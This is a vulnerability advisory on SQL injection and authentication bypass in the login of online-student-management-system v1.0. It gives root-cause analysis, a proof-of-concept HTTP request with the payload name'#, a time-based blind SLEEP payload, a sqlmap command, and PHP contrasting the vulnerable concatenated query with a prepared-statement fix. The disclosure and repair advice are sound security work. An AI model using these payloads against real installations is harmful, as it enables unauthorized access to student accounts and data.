code-projects online-student-management-system v1.0 SQL Injection - Authentication Bypass
NAME OF AFFECTED PRODUCT(S):
- online-student-management-system
Vendor Homepage:
Vuldb Submitter:
Vulnerable File:
- ~login.php
- ~/include/students.php
AFFECTED AND/OR FIXED VERSION(S):
Vulnerability Type:
- SQL Injection
- Authentication Bypass
Root Cause:
- Core description: Unsafe data concatenation leads to SQL injection
- Detailed technical analysis:
Command and data injection: In the studAuthentication method of ~/include/students.php, the program concatenates the unprocessed variable $U_USERNAME directly into the SQL command string. Because no prepared statement is used, an attacker can use SQL meta-characters (such as the single quotation mark ') to break the original query semantics and inject SQL of their choosing into the statement the database executes.
Authentication logic failure: Although the password is hashed, the injection point sits before the password check in the WHERE clause. By placing a comment character (such as # or --) in the username input, an attacker truncates the SQL statement so that the database ignores the AND ACC_PASSWORD condition; authentication then succeeds on the username alone, or on an always-true condition (OR 1=1), without the password ever being verified.
Missing input validation: The caller, login.php, only applies trim() to the input, with no whitelist validation (such as a regular-expression restriction) and no escaping, violating the security principle that "all external inputs are untrusted".
DESCRIPTION:
- A severe SQL injection vulnerability has been identified in the system authentication module. This vulnerability resides in the studAuthentication static method of the ~/include/students.php file. Due to the unsafe dynamic string concatenation employed by the program in constructing database queries, an attacker can bypass password verification logic by crafting a malicious username.
POC:
- Logging in with U_USERNAME set to name'# succeeds regardless of the password supplied in U_PASS.
POST /OnlineStudentManagementSystem_PHP/chmbac/login.php HTTP/1.1
Host: 192.168.1.29:8081
Content-Length: 53
Cache-Control: max-age=0
Origin: http://192.168.1.29:8081
Content-Type: application/x-www-form-urlencoded
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36 Edg/144.0.0.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://192.168.1.29:8081/OnlineStudentManagementSystem_PHP/chmbac/index.php
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Cookie: PHPSESSID=5m2eqc48ap6ttud9f3le1naopm
Connection: keep-alive
U_USERNAME=harry'#&U_PASS=...&sidebarLogin=
Parameter: U_USERNAME (POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: U_USERNAME=harr' AND (SELECT 9895 FROM (SELECT(SLEEP(5)))zPwT) AND 'JZBP'='JZBP&U_PASS=dffkdfjkfdsjf&sidebarLogin=
The following is the sqlmap command used during testing; the screenshots referred to above show the results obtained from that run:
sqlmap -u "http://192.168.1.29:8081/OnlineStudentManagementSystem_PHP/chmbac/login.php" \
--method POST \
--data "U_USERNAME=harr&U_PASS=dffkdfjkfdsjf&sidebarLogin=" \
-p U_USERNAME
Suggested Repair:
The core of the fix lies in separating SQL instructions from user data. Through prepared statements, the database first compiles the SQL template, and then binds user input only as "pure string parameters". At this point, injected single quotation marks ' or comment characters # are treated as ordinary characters and no longer have the ability to alter the SQL logic.
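As an added example that is not the project's own code, the concatenation pattern described under Root Cause is shown next to the prepared-statement repair described above. It assumes a mysqli connection, a table named students, a username column ACC_USERNAME, and that the stored ACC_PASSWORD hashes were produced by password_hash(); only ACC_PASSWORD and the variable names are taken from the advisory.

```php
<?php
// Added example, not the project's code. Assumptions: mysqli connection,
// table `students`, column `ACC_USERNAME`; `ACC_PASSWORD` is named in the advisory.

// BEFORE (the pattern the advisory describes): the username is spliced into the
// SQL text, so a value such as  name'#  closes the quote and comments out the
// "AND ACC_PASSWORD = ..." condition, leaving a query keyed on the username alone.
function studAuthentication_unsafe(mysqli $db, string $U_USERNAME, string $U_PASS): ?array
{
    $hash = hash('sha256', $U_PASS); // hash algorithm is an assumption
    $sql = "SELECT ACC_USERNAME FROM students WHERE ACC_USERNAME = '$U_USERNAME' AND ACC_PASSWORD = '$hash'";
    $result = $db->query($sql);
    return $result ? ($result->fetch_assoc() ?: null) : null;
}

// AFTER: the SQL template is compiled first and the username is bound as a
// parameter, so a quote or # in it is plain data and cannot change the query.
function studAuthentication(mysqli $db, string $U_USERNAME, string $U_PASS): ?array
{
    // Whitelist the shape of the username before it reaches the database at all.
    if (!preg_match('/^[A-Za-z0-9_.-]{1,64}$/', $U_USERNAME)) {
        return null;
    }
    $stmt = $db->prepare('SELECT ACC_USERNAME, ACC_PASSWORD FROM students WHERE ACC_USERNAME = ? LIMIT 1');
    $stmt->bind_param('s', $U_USERNAME);
    $stmt->execute();
    $stmt->bind_result($user, $storedHash);
    $found = $stmt->fetch();
    $stmt->close();

    // Verify the password in PHP, not in the WHERE clause: password_verify() is a
    // constant-time comparison and does not depend on query logic that an injected
    // comment could truncate (assumes hashes created with password_hash()).
    if (!$found || !password_verify($U_PASS, $storedHash)) {
        return null;
    }
    return ['ACC_USERNAME' => $user];
}
```

With the hardened version, the advisory's name'# input simply fails the whitelist, and even without the whitelist it would be looked up literally as a username containing a quote and a hash sign.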